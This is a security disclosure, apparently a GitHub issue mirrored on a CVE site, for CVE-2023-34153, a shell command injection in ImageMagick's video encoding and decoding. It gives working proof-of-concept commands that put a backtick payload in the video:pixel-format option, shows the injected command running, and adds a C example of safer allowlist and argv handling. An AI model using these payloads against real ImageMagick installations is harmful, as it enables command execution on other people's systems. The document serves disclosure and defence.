
CVE-2023-34153: Shell command injection vulnerability via `video:vsync` or `video:pixel-format` options in VIDEO encoding/decoding. · Issue #6338 · ImageMagick/ImageMagick

A vulnerability was found in ImageMagick. This security flaw causes a shell command injection vulnerability via video:vsync or video:pixel-format options in VIDEO encoding/decoding.

CVE
Tags: #vulnerability #linux #pdf #auth

ImageMagick version

7.1.0-1

Operating system

Linux

Operating system, version and so on

Any

Description

In reviewing historical vulnerabilities in ImageMagick, I discovered a shell command injection vulnerability in encoding/decoding VIDEO files, which very much resembles CVE-2020-29599.

In commit cc4638d, extra options are supported in VIDEO decode delegate execution, and through later commits, ImageMagick supports the user-defined options video:vsync and video:pixel-format, with their values concatenated into the delegate command executed via ExternalDelegateCommand.

In ExternalDelegateCommand, the command string is sanitized with SanitizeString and scanned for illegal chars, then passed to system(). However, the illegal char set contains only "&;<>|", not `"` (see link). This is the same mistake as in sanitizing the -authenticate parameter in PDF password support, but the common vulnerability in ExternalDelegateCommand did not get fixed.

Steps to Reproduce

Trigger the vulnerability in VIDEO decoding

Given a normal video file, namely test.mov, the following demonstrates how command injection happens.

/data/home/fullwaywang/exp ➜ echo 'deadbeef' > test.txt

/data/home/fullwaywang/exp ➜ magick identify -define video:pixel-format='rgba"`cat test.txt > /tmp/leak.txt`"' test.mov >info.log

/data/home/fullwaywang/exp ➜ tail info.log
test.mov[891] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.320u 0:00.312
test.mov[892] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.310u 0:00.298
test.mov[893] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.290u 0:00.285
test.mov[894] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.280u 0:00.271
test.mov[895] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.260u 0:00.258
test.mov[896] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.250u 0:00.244
test.mov[897] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.230u 0:00.231
test.mov[898] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.220u 0:00.218
test.mov[899] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 0.210u 0:00.204
test.mov[900] MOV 480x270 480x270+0+0 8-bit TrueColor sRGB 445.5MiB 0.200u 0:00.191

/data/home/fullwaywang/exp ➜ cat /tmp/leak.txt
deadbeef

Trigger the vulnerability in VIDEO encoding

Given a normal image file, namely smile.gif, the following demonstrates how command injection happens.

/data/home/fullwaywang/exp ➜ magick convert -define video:pixel-format='rgba"`cat test.txt > /tmp/leak3.txt`"' smile.gif smile.mov

/data/home/fullwaywang/exp ➜ cat /tmp/leak3.txt
deadbeef

Images

No response

Reporter

fullwaywang
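The root cause described above is a blocklist ("&;<>|") applied to a value that is then handed to system(). The following added example, which is neither ImageMagick's code nor the reporter's, contrasts that blocklist style of check with an allowlist for a pixel-format token and with building an argv array for the delegate so that no shell ever parses the value. The function names, the ffmpeg-style argument layout and the sample values are assumptions made for illustration.

```c
/* Added example (not ImageMagick's own code). Contrasts the blocklist check
 * described in the report with an allowlist check for a delegate option value
 * such as video:pixel-format, and shows the value passed as its own argv
 * element instead of being spliced into a system() command string.
 * All names here are hypothetical. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Mirrors the report's description of the illegal-character set: only
 * "&;<>|" is rejected. Returns 1 if the value would be accepted. */
int blocklist_accepts(const char *value)
{
    static const char illegal[] = "&;<>|";
    for (const char *p = value; *p != '\0'; p++)
        if (strchr(illegal, *p) != NULL)
            return 0;
    return 1;
}

/* Allowlist: a pixel-format token is alphanumeric plus underscore
 * (e.g. "rgba", "yuv420p"). Quotes, backticks, "$(" and whitespace are
 * all rejected by construction. Returns 1 if accepted. */
int allowlist_accepts(const char *value)
{
    if (value == NULL || *value == '\0')
        return 0;
    for (const unsigned char *p = (const unsigned char *)value; *p != '\0'; p++)
        if (!isalnum(*p) && *p != '_')
            return 0;
    return 1;
}

/* Builds an argument vector suitable for posix_spawn()/execvp(), where the
 * option value is a separate argv entry and is never interpreted by a shell.
 * Returns the number of entries written (excluding the terminating NULL),
 * or -1 if the value fails the allowlist or the buffer is too small. */
int build_delegate_argv(const char *pixel_format, const char *input,
                        const char *output, const char *argv_out[], size_t max)
{
    if (!allowlist_accepts(pixel_format) || max < 7)
        return -1;
    size_t n = 0;
    argv_out[n++] = "ffmpeg";      /* hypothetical delegate program */
    argv_out[n++] = "-i";
    argv_out[n++] = input;
    argv_out[n++] = "-pix_fmt";
    argv_out[n++] = pixel_format;  /* reaches the delegate verbatim, unparsed */
    argv_out[n++] = output;
    argv_out[n] = NULL;
    return (int)n;
}

int main(void)
{
    /* Constructed sample values: a benign token and one shaped like the
     * report's PoC, which the blocklist accepts and the allowlist rejects. */
    const char *benign = "rgba";
    const char *hostile = "rgba\"`cat test.txt`\"";
    printf("blocklist: %s -> %d, %s -> %d\n", benign,
           blocklist_accepts(benign), hostile, blocklist_accepts(hostile));
    printf("allowlist: %s -> %d, %s -> %d\n", benign,
           allowlist_accepts(benign), hostile, allowlist_accepts(hostile));
    return 0;
}
```

The point of build_delegate_argv is that once the value is an argv element rather than part of a string given to system(), the question of which characters are "illegal" disappears; the allowlist then only has to guarantee the delegate receives a sensible pixel-format name, not to defend a shell.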

Related news

Gentoo Linux Security Advisory 202405-02

Gentoo Linux Security Advisory 202405-2 - Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. Versions greater than or equal to 6.9.13.0 are affected.

Ubuntu Security Notice USN-6200-1

Ubuntu Security Notice 6200-1 - It was discovered that ImageMagick incorrectly handled the "-authenticate" option for password-protected PDF files. An attacker could possibly use this issue to inject additional shell commands and perform arbitrary code execution. This issue only affected Ubuntu 20.04 LTS. It was discovered that ImageMagick incorrectly handled certain values when processing PDF files. If a user or automated system using ImageMagick were tricked into opening a specially crafted PDF file, an attacker could exploit this to cause a denial of service. This issue only affected Ubuntu 20.04 LTS.

CVE-2020-29599: ImageMagick - Shell injection via PDF password

ImageMagick before 6.9.11-40 and 7.x before 7.0.10-40 mishandles the -authenticate option, which allows setting a password for password-protected PDF files. The user-controlled password was not properly escaped/sanitized and it was therefore possible to inject additional shell commands via coders/pdf.c.
